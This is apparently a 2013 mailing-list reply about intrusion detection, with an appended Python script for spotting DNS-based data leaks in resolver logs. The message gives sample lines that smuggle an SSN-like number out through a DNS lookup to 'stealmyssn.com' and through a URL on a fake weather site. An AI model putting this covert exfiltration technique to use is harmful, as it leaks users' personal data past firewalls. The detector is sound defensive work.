[Tfug] Lightweight IDS options/strategy/policy

Bexley Hall bexley401 at yahoo.com
Wed Sep 25 16:28:28 MST 2013


Hi Kramer,

On 9/25/2013 3:57 PM, Kramer Lee wrote:
> "appears to only be "reading" from the outside world"
>
> Well, it depends on what they are reading.
>
> Probably the good info they get will be sent out encrypted.  If you
> have some NSA grade encryption busters, you can see what it is and
> maybe stop it.  If they have some NSA grade back-doors etc, they might
> be able to get whatever they want.

nslookup(123771665.stealmyssn.com)

I.e., if you let an app *look* at something, you have to assume
that it *can* pass that information to a third party despite
any firewalls, etc. that you put in place.

E.g., install a "weather reporting" app and the above could be passed
by resolving http://www.weatherthief.com/currentweather/123771665.html

If the system runs 24/7/365 then it can covertly pass a *boatload*
of information without raising any eyebrows!
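
The lookup pattern described in the message above can be spotted from a resolver's query log. The following is an added example, not part of the original message: it flags a client that resolves many distinct, data-like subdomains under one parent domain. The log format, the thresholds, the function names and every sample line are assumptions constructed for illustration.

```python
from collections import defaultdict

# Constructed sample resolver log, one query per line: "<epoch> <client_ip> <qname>"
SAMPLE_LOG = """\
1380150000 192.168.1.20 www.example.org
1380150060 192.168.1.20 123771665.stealmyssn.com
1380153660 192.168.1.20 449120083.stealmyssn.com
1380157260 192.168.1.20 871003412.stealmyssn.com
1380157265 192.168.1.20 871003412.stealmyssn.com
1380157300 192.168.1.30 20130925.cdn.example.net
1380157400 192.168.1.30 mail.example.org
"""

def split_qname(qname):
    """Return (parent_domain, subdomain_part).
    Assumption: the parent is the last two labels (no public-suffix list)."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:]), ".".join(labels[:-2])

def looks_like_payload(sub):
    """Data-bearing labels tend to be long and digit-heavy, unlike 'www' or 'mail'."""
    text = sub.replace(".", "")
    if len(text) < 8:
        return False
    return sum(c.isdigit() for c in text) / len(text) >= 0.5

def find_dns_leaks(log_text, min_unique=3):
    """Map (client, parent_domain) -> sorted distinct payload-like subdomains,
    keeping only pairs with at least min_unique distinct values."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue  # skip malformed lines
        _, client, qname = parts
        domain, sub = split_qname(qname)
        if looks_like_payload(sub):
            seen[(client, domain)].add(sub)  # set: repeated queries count once
    return {k: sorted(v) for k, v in seen.items() if len(v) >= min_unique}

if __name__ == "__main__":
    for (client, domain), subs in find_dns_leaks(SAMPLE_LOG).items():
        print(f"{client} -> {domain}: {len(subs)} distinct data-like names {subs}")
```

Counting distinct names per client over a long window matters more than query rate here, since a host that is always on can send one lookup an hour and stay under any rate alarm. The same grouping applies to URL paths in a proxy log for the HTTP variant.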



